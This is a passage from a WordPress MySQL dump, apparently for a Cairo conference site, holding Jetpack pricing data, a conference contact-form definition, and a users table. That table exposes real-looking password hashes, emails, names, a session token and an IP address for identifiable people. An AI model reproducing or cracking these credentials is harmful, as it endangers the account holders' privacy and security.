(Beta)\";s:12:\"product_slug\";s:30:\"jetpack_social_advanced_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$179.40\";s:21:\"combined_cost_display\";s:7:\"$179.40\";s:4:\"cost\";d:179.4;s:18:\"cost_smallest_unit\";i:17940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:5:\"month\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";i:0;s:17:\"cost_per_interval\";i:12;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$14.95\";}s:31:\"jetpack_social_advanced_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2603;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:31:\"jetpack_social_advanced_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$22.95\";s:21:\"combined_cost_display\";s:6:\"$22.95\";s:4:\"cost\";d:22.95;s:18:\"cost_smallest_unit\";i:2295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"jetpack_golden_token_lifetime\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2900;s:12:\"product_name\";s:20:\"Jetpack Golden Token\";s:12:\"product_slug\";s:29:\"jetpack_golden_token_lifetime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-golden-token\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}}'),
(132,1,'jetpack_tracks_wpcom_id','239025956'),
(134,1,'session_tokens','a:1:{s:64:\"57bb370c5b216f6a70c45afd834542fd407ee40257d46103bbf72a47af4ea2ab\";a:4:{s:10:\"expiration\";i:1696291829;s:2:\"ip\";s:14:\"142.247.168.14\";s:2:\"ua\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43\";s:5:\"login\";i:1696119029;}}');
/*!40000 ALTER TABLE `dnctiavkr_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_users`
--

DROP TABLE IF EXISTS `dnctiavkr_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_users`
--

LOCK TABLES `dnctiavkr_users` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_users` DISABLE KEYS */;
INSERT INTO `dnctiavkr_users` VALUES
(1,'admin_gsw23','$P$BDTeqCjLZWao.M4uRdjOiB3boMtaKe1','admin_gsw23','ay.zaghweb@gmail.com','https://gsw2023.com','2022-10-03 21:24:25','',0,'admin'),
(4,'nagy','$P$BfQ0FCKPs7dD26q5gBJda1WhJwhNvP.','nagy','nagy@aast.edu','http://cai.aast.edu/nagy','2023-06-23 19:45:47','1687549547:$P$BTi5jJ.iRJ9maaSiLxfLfUL0aYO67A1',0,'Nagy K. Aly');
/*!40000 ALTER TABLE `dnctiavkr_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_vform`
--

DROP TABLE IF EXISTS `dnctiavkr_vform`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_vform` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `formname` varchar(200) NOT NULL,
  `formdescription` varchar(1000) NOT NULL,
  `formbody` longtext NOT NULL,
  `status` varchar(50) NOT NULL,
  `confirmation` varchar(200) DEFAULT NULL,
  `confirmation_value` mediumtext DEFAULT NULL,
  `notification_mode` varchar(100) DEFAULT NULL,
  `send_to` varchar(200) DEFAULT NULL,
  `email_subject` varchar(500) DEFAULT NULL,
  `from_name` varchar(200) DEFAULT NULL,
  `from_email` varchar(200) DEFAULT NULL,
  `reply_to` varchar(200) DEFAULT NULL,
  `message` longtext DEFAULT NULL,
  `datesubmit` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_vform`
--

LOCK TABLES `dnctiavkr_vform` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_vform` DISABLE KEYS */;
INSERT INTO `dnctiavkr_vform` VALUES
(1,'GSW2023 Contact Form','','&lt;div class=\\&quot;form-all vform-mainfields-inside ui-sortable\\&quot;&gt; &lt;div class=\\&quot;vform-group ui-sortable-handle\\&quot; data-type=\\&quot;heading\\&quot; data-batchid=\\&quot;13\\&quot; id=\\&quot;vform-group13\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text text-headingvf\\&quot;&gt;Please Fill Contact Form&lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group ui-sortable-handle\\&quot; data-type=\\&quot;divider\\&quot; data-batchid=\\&quot;10\\&quot; id=\\&quot;vform-group10\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;hr&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group ui-sortable-handle\\&quot; data-type=\\&quot;multiplechoice\\&quot; data-batchid=\\&quot;4\\&quot; id=\\&quot;vform-group4\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Multiple Choice&lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-multiplechoice\\&quot;&gt;&lt;ul class=\\&quot;primary-input\\&quot;&gt;&lt;li&gt;&lt;input type=\\&quot;radio\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;multiplechoice[]\\&quot; value=\\&quot;Mr.\\&quot;&gt;Mr.&lt;/li&gt;&lt;li&gt;&lt;input type=\\&quot;radio\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;multiplechoice[]\\&quot; value=\\&quot;Ms.\\&quot;&gt;Ms.&lt;/li&gt;&lt;li&gt;&lt;input type=\\&quot;radio\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;multiplechoice[]\\&quot; value=\\&quot;Dr.\\&quot;&gt;Dr.&lt;/li&gt;&lt;li&gt;&lt;input type=\\&quot;radio\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;multiplechoice[]\\&quot; value=\\&quot;Prof.\\&quot;&gt;Prof.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group vform-required ui-sortable-handle\\&quot; data-type=\\&quot;name\\&quot; data-batchid=\\&quot;0\\&quot; id=\\&quot;vform-group0\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Name &lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-first-name\\&quot;&gt;&lt;input type=\\&quot;text\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;firstname[]\\&quot; required=\\&quot;required\\&quot;&gt;&lt;label class=\\&quot;vform-sub-label\\&quot;&gt;First&lt;/label&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-middle-name\\&quot;&gt;&lt;input type=\\&quot;text\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;middlename[]\\&quot;&gt;&lt;label class=\\&quot;vform-sub-label\\&quot;&gt;Middle&lt;/label&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-last-name\\&quot;&gt;&lt;input type=\\&quot;text\\&quot; placeholder=\\&quot;\\&quot; name=\\&quot;lastname[]\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot;&gt;&lt;label class=\\&quot;vform-sub-label\\&quot;&gt;Last&lt;/label&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group vform-required\\&quot; data-type=\\&quot;singleline\\&quot; data-batchid=\\&quot;14\\&quot; id=\\&quot;vform-group14\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Affiliation&lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-singleline-text\\&quot;&gt;&lt;input type=\\&quot;text\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;singleline[]\\&quot; required=\\&quot;required\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group vform-required ui-sortable-handle\\&quot; data-type=\\&quot;singleline\\&quot; data-batchid=\\&quot;15\\&quot; id=\\&quot;vform-group15\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Nationality &lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-singleline-text\\&quot;&gt;&lt;input type=\\&quot;text\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;singleline[]\\&quot; required=\\&quot;required\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group vform-required ui-sortable-handle\\&quot; data-type=\\&quot;email\\&quot; data-batchid=\\&quot;1\\&quot; id=\\&quot;vform-group1\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Email &lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-email\\&quot;&gt;&lt;input type=\\&quot;email\\&quot; name=\\&quot;email[]\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; required=\\&quot;required\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group vform-required ui-sortable-handle\\&quot; data-type=\\&quot;phone\\&quot; data-batchid=\\&quot;14\\&quot; id=\\&quot;vform-group14\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Affiliation&lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-phone\\&quot;&gt;&lt;input type=\\&quot;tel\\&quot; name=\\&quot;phone[]\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; required=\\&quot;required\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group vform-required ui-sortable-handle\\&quot; data-type=\\&quot;singleline\\&quot; data-batchid=\\&quot;16\\&quot; id=\\&quot;vform-group16\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;ID on Conftool&lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-singleline-text\\&quot;&gt;&lt;input type=\\&quot;text\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;singleline[]\\&quot; required=\\&quot;required\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group ui-sortable-handle\\&quot; data-type=\\&quot;divider\\&quot; data-batchid=\\&quot;9\\&quot; id=\\&quot;vform-group9\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;hr&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group vform-required ui-sortable-handle\\&quot; data-type=\\&quot;singleline\\&quot; data-batchid=\\&quot;6\\&quot; id=\\&quot;vform-group6\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Hotel accommodation in Cairo&lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-singleline-text\\&quot;&gt;&lt;input type=\\&quot;text\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; name=\\&quot;singleline[]\\&quot; required=\\&quot;required\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group vform-required ui-sortable-handle\\&quot; data-type=\\&quot;datetime\\&quot; data-batchid=\\&quot;7\\&quot; id=\\&quot;vform-group7\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Check-in Date&lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-datetime\\&quot;&gt;&lt;input type=\\&quot;datetime-local\\&quot; name=\\&quot;datetime[]\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot; required=\\&quot;required\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div 